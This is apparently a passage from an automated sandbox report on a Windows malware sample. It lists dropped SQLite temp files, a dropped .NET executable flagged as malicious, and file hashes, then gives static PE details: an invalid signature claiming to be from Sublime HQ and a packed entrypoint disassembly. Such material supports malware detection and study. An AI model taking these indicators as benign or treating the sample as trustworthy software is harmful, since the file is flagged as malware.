SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:false
Reputation:unknown
C:\Users\user\AppData\Local\Temp\tmpB9ED.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6970840431455908
Encrypted:false
SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:false
Reputation:unknown
C:\Users\user\AppData\Local\Temp\tmpB9EE.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):20480
Entropy (8bit):0.6970840431455908
Encrypted:false
SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:false
Reputation:unknown
C:\Users\user\AppData\Local\Temp\tmpC7.tmp
Process:C:\Users\user\AppData\Local\Temp\srvs.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
C:\Users\user\AppData\Local\Temp\tmpC8.tmp
Process:C:\Users\user\AppData\Local\Temp\srvs.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpD9.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDA.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDB.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDC.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDEB3.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDEB4.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                              Entropy (8bit):1.1874185457069584
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                                              MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                                              SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                                              SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                                              SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\tmpDED4.tmp
                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\srvs.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                              Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
C:\Users\user\AppData\Local\Temp\tmpDED5.tmp
Process:C:\Users\user\AppData\Local\Temp\srvs.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
C:\Users\user\AppData\Local\Temp\tmpDED6.tmp
Process:C:\Users\user\AppData\Local\Temp\srvs.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
C:\Users\user\AppData\Local\Temp\tmpDED7.tmp
Process:C:\Users\user\AppData\Local\Temp\srvs.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
C:\Users\user\AppData\Local\Temp\tmpEE1E.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
C:\Users\user\AppData\Local\Temp\tmpEE1F.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
C:\Users\user\AppData\Local\Temp\tmpEE20.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
C:\Users\user\AppData\Local\Temp\tmpEE50.tmp
Process:C:\Users\user\AppData\Roaming\1234.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):73728
Entropy (8bit):1.1874185457069584
Encrypted:false
SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:72A43D390E478BA9664F03951692D109
SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:false
Reputation:unknown
Preview: SQLite format 3......@ .......$...C... (remainder of the header preview is non-printable bytes)
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\1234.exe
                                                                                                                                                                                              Process:C:\Users\user\Desktop\Nb2HQZZDIf.exe
                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):979968
                                                                                                                                                                                              Entropy (8bit):7.361382512565047
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:cGRXJBEsyGeV5qLHKK1QK1MuSUqMidk++KANTbCPpUlmLXIRE:T9JB8rWHKK131MuadkJK4qrXIW
                                                                                                                                                                                              MD5:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                                              SHA1:BB965F2D97B19ED01702B8182BBD870670A1E75B
                                                                                                                                                                                              SHA-256:20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                                                                                                                                                                                              SHA-512:BD6C23385D7B914AD9A423D71DF9FA33BA917BA696270DF1435D90DE24B7B1286A7263FD10A027C17C41A899E5667F4481C83B385931ECCD244AEA7971D519F2
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................."...........@... ...`....@.. ....................................@.................................P@..K.......0....................`....................................................... ............... ..H............text.... ... ...".................. ..`.sdata.. ....`.......&..............@....rsrc...0............(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Roaming\field
                                                                                                                                                                                              Process:C:\Users\user\Desktop\Nb2HQZZDIf.exe
                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):116
                                                                                                                                                                                              Entropy (8bit):4.529003957966892
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
                                                                                                                                                                                              MD5:EC6AAE2BB7D8781226EA61ADCA8F0586
                                                                                                                                                                                              SHA1:D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
                                                                                                                                                                                              SHA-256:B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
                                                                                                                                                                                              SHA-512:AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                              Preview: .PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                                              Entropy (8bit):7.539500203560168
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                                              • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                                              File name:Nb2HQZZDIf.exe
                                                                                                                                                                                              File size:627616
                                                                                                                                                                                              MD5:b8371590264db62ecbba4b7f481a21a8
                                                                                                                                                                                              SHA1:837bfd10d70113330b2e00a1f12e99c4b0065d38
                                                                                                                                                                                              SHA256:fa3e22734ccb01da24364b65793ca5d2fafc53fbe6cef3eab8d76b158d1e0d7a
                                                                                                                                                                                              SHA512:235f087e2039835dc9c944178c34f6dc924a91d028b75b25c545b8a7b8eea81e4556ec1600fe9f04d36118bd93ed4cccfbbc0f135296fcd5776c366db51979f1
                                                                                                                                                                                              SSDEEP:12288:37iuUvUF2JxjnxXAHbcbzlarx98lR1omCAIEwQbbC+3q99:37iuUvFjxXjgM4mCbEwQbbC+3q99
                                                                                                                                                                                              File Content Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d....4.V..........#..........Z......R3.........@.............................p......D..... ...@..............................................0..X....@..H%...p..4_...l...'.................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:70cc8c6d69aacc70

                                                                                                                                                                                              Static PE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Entrypoint:0x140143352
                                                                                                                                                                                              Entrypoint Section:.MPRESS2
                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                              Imagebase:0x140000000
                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                                              DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                                                                                                              Time Stamp:0x56F734A2 [Sun Mar 27 01:17:22 2016 UTC]
                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                              OS Version Minor:2
                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                              File Version Minor:2
                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                              Subsystem Version Minor:2
                                                                                                                                                                                              Import Hash:caa5e6a2892587c2324418efee31c648

                                                                                                                                                                                              Authenticode Signature

                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                              Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                              Error Number:-2146869232
                                                                                                                                                                                              Not Before, Not After
                                                                                                                                                                                              • 5/22/2019 5:00:00 PM 5/23/2023 4:59:59 PM
                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                              • CN=Sublime HQ Pty Ltd, O=Sublime HQ Pty Ltd, STREET=Suite 102, STREET=377 New South Head Rd, L=Doubte Bay, S=NSW, PostalCode=2028, C=AU
                                                                                                                                                                                              Version:3
                                                                                                                                                                                              Thumbprint MD5:A32549731E28A0F6BA85C9B2C50FE589
                                                                                                                                                                                              Thumbprint SHA-1:834F29A60152CE36EB54AF37CA5F8EC029ECCF01
                                                                                                                                                                                              Thumbprint SHA-256:E025B15847B86808B69C605D7FC63A186CBF1D9A4ED5A1971B2FF5F9C6F50DF0
                                                                                                                                                                                              Serial:00972FADA2BC13FA55C5D47FEF56AEE0F4

                                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                                              Instruction
                                                                                                                                                                                              push edi
                                                                                                                                                                                              push esi
                                                                                                                                                                                              push ebx
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              push edx
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              push eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              lea eax, dword ptr [00000ADEh]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov esi, dword ptr [eax]
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add esi, eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              sub eax, eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov edi, esi
                                                                                                                                                                                              lodsw
                                                                                                                                                                                              shl eax, 0Ch
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                              push eax
                                                                                                                                                                                              lodsd
                                                                                                                                                                                              sub ecx, eax
                                                                                                                                                                                              dec eax
                                                                                                                                                                                              add esi, ecx
                                                                                                                                                                                              mov ecx, eax
                                                                                                                                                                                              push edi
                                                                                                                                                                                              inc esp
                                                                                                                                                                                              mov eax, ecx
                                                                                                                                                                                              dec ecx
                                                                                                                                                                                              mov al, byte ptr [ecx+edi+06h]
                                                                                                                                                                                              mov byte ptr [ecx+esi], al
                                                                                                                                                                                              jne 00007FF6507C9637h
                                                                                                                                                                                              inc ecx
                                                                                                                                                                                              push ecx
                                                                                                                                                                                              push ebp
                                                                                                                                                                                              sub eax, eax
lodsb
mov ecx, eax
shr ecx, 04h
push ecx
and al, 0Fh
push eax
lodsb
mov ecx, eax
add cl, byte ptr [esp]
push eax
dec eax
mov ebp, FFFFFD00h
dec eax
shl ebp, cl
pop ecx
pop eax
dec eax
shl eax, 20h
dec eax
add ecx, eax
pop eax
dec eax
mov ebx, esp
dec eax
lea esp, dword ptr [esp+ebp*2-00000E70h]
push eax
push ecx
dec eax
sub ecx, ecx
push ecx
push ecx
dec eax
mov ecx, esp
push ecx
mov dx, word ptr [edi]
shl edx, 0Ch
push edx
push edi
dec esp
lea ecx, dword ptr [ecx+08h]
dec ecx
lea ecx, dword ptr [ecx+08h]
push esi
pop edx
dec eax
sub esp, 20h
call 00007FF6507C970Dh
dec eax
mov esp, ebx
pop ebp
inc ecx
pop ecx
pop esi
pop edx
sub edx, 00001000h
sub ecx, ecx
cmp ecx, edx
jnc 00007FF6507C968Ch
mov ebx, ecx
lodsb
inc ecx
cmp al, FFh
jne 00007FF6507C964Fh
mov al, byte ptr [esi]
and al, FDh
cmp al, 15h
jne 00007FF6507C962Dh
lodsb
inc ecx
jmp 00007FF6507C9659h
cmp al, 8Dh
jne 00007FF6507C964Fh
mov al, byte ptr [esi]
and al, C7h

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
